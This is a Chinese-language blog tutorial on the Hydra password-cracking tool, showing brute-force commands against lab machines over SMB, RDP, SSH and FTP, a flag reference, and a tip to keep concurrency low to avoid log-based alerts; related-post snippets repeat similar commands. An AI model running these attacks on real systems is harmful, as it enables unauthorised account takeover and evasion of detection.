hydra 使用介绍

最新推荐文章于 2024-05-09 17:08:28 发布
最新推荐文章于 2024-05-09 17:08:28 发布
阅读量2.3w 收藏 50
点赞数 6
分类专栏: 工具使用 文章标签: 运维 安全 linux ssh
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42342141/article/details/106390594
版权

一、环境

linux、Win2003、kali

二、命令介绍

查看 hydra 帮助信息:
hydra -h
...

支持在线破解的服务协议:
Supported services: adam6500 asterisk cisco cisco-enable cvs 
firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form 
http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] 
ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp 
oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres 
radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb 
smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s]
 vmauthd vnc xmpp

使用示例:
Examples:
  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
  hydra -l admin -p password ftp://[192.168.0.0/24]/
  hydra -L logins.txt -P pws.txt -M targets.txt ssh

-l 后面跟着 具体的用户名
-p 后面跟着 具体的密码
-L 后面跟着 用户字典
-P 后面跟着 密码字典

三、具体使用

3.1 Windows 系统文件共享 smb协议

信息发现:
在这里插入图片描述445、139 文件共享服务
3389 远程桌面

(1)Win2003 查看你文件共享
net share

在这里插入图片描述

(2)开始破解
hydra -l Administrator -P pass.txt smb://192.168.47.124

在这里插入图片描述

爆破 3389 端口
hydra -l Administrator -P pass.txt rdp://192.168.47.124 -V
一般爆破 RDP 最后别选择多进程、多线程:
hydra -l Administrator -P pass.txt rdp://192.168.47.124 -t 1 -V

在这里插入图片描述显然这个工具爆破失败了!!! 前面测试 Administrator 密码为 root

linux 系统 ssh密码破解

目标机:metasploitable2

hydra -l msfadmin -P pass.txt ssh://192.168.47.133 -vV

在这里插入图片描述

ftp 服务破解

端口扫描下:
在这里插入图片描述

这次用户和密码都用字典试试:
hydra -L user.txt -P pass.txt ftp://192.168.47.133 -s 2121 -e nsr -t 1 -vV

-s:指定服务端口

在这里插入图片描述

四、参数详解

-R 根据上一次进度继续破解
-S 使用SSL协议连接
-s 指定端口
-l 指定用户名
-L 指定用户名字典(文件)
-p 指定密码破解
-P 指定密码字典(文件)
-e 空密码探测和指定用户密码探测(ns)
-C 用户名可以用:分割(username:password)可以代替-l username -p password
-o 输出文件
-t 指定多线程数量,默认为16个线程
-vV 显示详细过程
server 目标IP
service 指定服务名(telnet ftp pop3 mssql mysql ssh ssh2......)

日志报警机制: 控制单位时间内单个IP访问次数
所以一般不选择多并发进行爆破!
hydra 同样支持 网页登入口密码爆破,就不介绍了,BP也挺好用的,哈哈!

另外 hydra 也有图形化的界面
在这里插入图片描述

初学者L_言
关注
  • 6
    点赞
  • 50
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
暴力破解工具-hydra使用
shenshuiwubo123的博客
06-02 2541
一、hydra简介: ydra(九头蛇),分布式任务处理系统,由社交标签服务提供商AddThis六年前开发,现在已得到Apache的开源许可,就像Hadoop一样,只是还没有Hadoop那样的知名度和声势。Hydra的创造者称,该“多头”平台非常擅长处理一些大的数据任务——对非常大的数据集进行实时处理。 hydra 是一款世界顶级密码暴力破解工具,支持几乎所有的协议的在线破解,功能强大,其密码...
Hydra架构介绍1
08-08
Hydra 架构介绍与分布式跟踪系统 Hydra 架构是为了解决大规模分布式集群中的服务调用跟踪问题而设计的。这种架构的开发初衷是为了支撑互联网应用的各种服务,通常这些服务都是由不同的团队开发、使用不同的编程语言...
Hydra密码爆破工具使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
m0_61869253的博客
09-07 4046
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
Hydra密码爆破工具使用教程图文教程(超详细)
wangyuxiang946的博客
12-06 2万+
Hydra也叫九头蛇,是一款开源的暴力PJ工具,集成在kali当中。
网络安全最全Hydra密码爆破工具使用教程图文教程(超详细),2024年最新含泪整理面经
最新发布
2401_84254343的博客
05-09 1096
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。我们的密码字典中有三个密码,它也会执行三次,并把执行过程列了出来。
hydra使用教程
weixin_45778886的博客
03-14 3691
目录标题注意hydra详细使用教程hydra简介hydra常用命令hydra支持破解的服务/协议对应功能的参数模板1、破解ssh:2、破解ftp:3、get方式提交,破解web登录:4、post方式提交,破解web登录:5、破解https:6、破解teamspeak:7、破解cisco:8、破解smb:9、破解pop3:10、破解rdp:11、破解http-proxy:12、破解imap:实例演示-破解SSH密码1.使用字典对目标服务进行破解。2.当目标服务开放的端口不是默认端口时,使用 -s 进行指定。3
hydra简介
WJ.L
05-11 474
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f IP http-get /admin/index.php。#破解telnet: hydra IP telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V。#破解ftp: hydra IP ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV。hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns IP http-get /admin/
Hydra的基本使用
qq_46429177的博客
11-18 1385
-R 根据上一次进度继续破解 -S 使用SSL协议连接 -s 指定端口 -l 指定用户名 -L 指定用户名字典(文件) -p 指定密码破解 -P 指定密码字典(文件) -e 空密码探测和指定用户密码探测(ns) -C 用户名可以用:分割(username:password)可以代替-l username -p password -o 输出文件 -t 指定多线程数量,默认为16个线程 -vV 显示详细过程 使用案例: 使用hydra破解ssh的密码 hydra -L users.txt -P password
hydra-examples:学习Hydra的示例和演示代码
05-06
Hydra使用JavaScript时,其结构几乎不需要任何JavaScript知识。 如果您来自另一种语言,或者是编程新手,则可以在Hydra中构建非常有趣的视觉效果。 本质上,Hydra接受输入→对其进行修改→返回输出。 安装九头蛇 ...
hydra viewer for Mac 屏幕共享软件
02-04
解压后,用户可以直接将这个文件拖放到"应用程序"文件夹中,然后就能在Launchpad或Finder中启动Hydra Viewer开始使用。 总的来说,Hydra Viewer for Mac是一款集高效、安全和易用于一体的屏幕共享软件,无论是在...
Hydra 安装手册.docx
03-11
本手册将详细介绍Hydra的安装和配置步骤,以便于用户能够顺利地在自己的环境中部署和运行。 1. 硬件和软件要求 - 硬件要求:Hydra系统需要至少包括一台用于Zookeeper的单点或集群服务器、一台部署Hydra-manager的...
hydra使用帮助手册
01-17
是用kali linux 是离不开hydra的 这是一个很强大的工具 hydra使用帮助手册(官方原版) 此手册有详细的各个参数解释说明并举例,也有所有支持的协议 等
Hydra 安装手册.pdf
03-11
在这一章节中,Hydra 的部署过程被简单介绍,包括其基本功能、设计目标以及在整个大数据处理流程中的位置。Hydra 致力于简化数据处理,提供快速的数据接入、处理和分析能力,以满足企业对于海量数据的实时和离线处理...
Hydra(九头蛇)工具使用(非常详细)从零基础入门到精通,看完这一篇就够了。
qq_44005305的博客
07-25 1538
hydra(九头蛇)是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解。密码能否破解,在于字典是否强大。
【网安神器篇】——hydra爆破工具
Demo不是emo的博客
11-22 1万+
今天给大家分享的神兵利器是一款爆破工具——hydra
密码暴利破解工具Hydra(海德拉)使用详解
热门推荐
lucashu的博客
04-15 4万+
本文目录Hydra概述参数详解使用方法破解SSH字典推荐Kali自带密码字典dirb文件夹28G大字典 Hydra概述 Hydra是一款由著名的黑客组织THC开发的开源暴力破解工具,支持大部分协议的在线密码破解,是网络安全·渗透测试必备的一款工具。 安装方法:Kali中自带hydra,直接搜索关键字即可。 参数详解 在Kali的命令行中输入hydra -h即可查看hydra 的所有参数 具...
hydra详解(仅供学习参考)
m0_50818626的博客
07-11 1328
Hydra是一款非常强大的暴力破解工具,由著名的黑客组织THC开发的一款开源暴力破解工具。hydra 参数 IP 服务。2、 加载对应命令开始爆破。三、各类协议破解具体方法。
【经验分享】Hydra(爆破神器)使用方法
weixin_33730836的博客
11-08 3736
这个也是backtrack下面很受欢迎的一个工具 参数详解:-R 根据上一次进度继续破解-S 使用SSL协议连接-s 指定端口-l 指定用户名-L 指定用户名字典(文件)-p 指定密码破解-P 指定密码字典(文件)-e 空密码探测和指定用户密码探测(ns)-C 用户名可以用:分割(username:password)可以代替-l username -p password-o 输出文件-t 指定多...
暴力破解工具——Hydra使用教程
世间繁华梦一出
03-07 5931
一、Hydra简介 hydra是一款开源的暴力密码破解工具,支持多种协议密码的破解。 二、常用命令 这里去除了字典生成部分,因为有专业的工具进行字典生成。而且hydra不适用于http(s)的破解,如果想进行http(s)的破解,请用 burpsuit进行破解。 -R 还原以前中止或崩溃的会话 -S 使用SSL连接 -s 指定非默认端口 -l
hydra mysql
04-20
Hydra MySQL是一个用于MySQL数据库的并行化测试工具。它可以通过同时发送多个请求来模拟高负载环境下的数据库访问,并且可以对数据库进行性能测试和压力测试。 Hydra MySQL具有以下特点: 1. 并行化:Hydra MySQL可以同时发送多个请求,以模拟并发访问数据库的情况,从而测试数据库在高负载下的性能表现。 2. 灵活性:Hydra MySQL支持自定义的SQL查询语句,可以根据需要进行各种类型的数据库操作,如插入、更新、删除和查询等。 3. 可扩展性:Hydra MySQL可以通过配置文件进行参数设置,包括并发连接数、请求次数、线程数等,以满足不同规模和需求的测试场景。 4. 实时监控:Hydra MySQL提供了实时监控和统计信息,包括每秒请求数、平均响应时间、错误率等,方便用户对数据库性能进行评估和分析。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值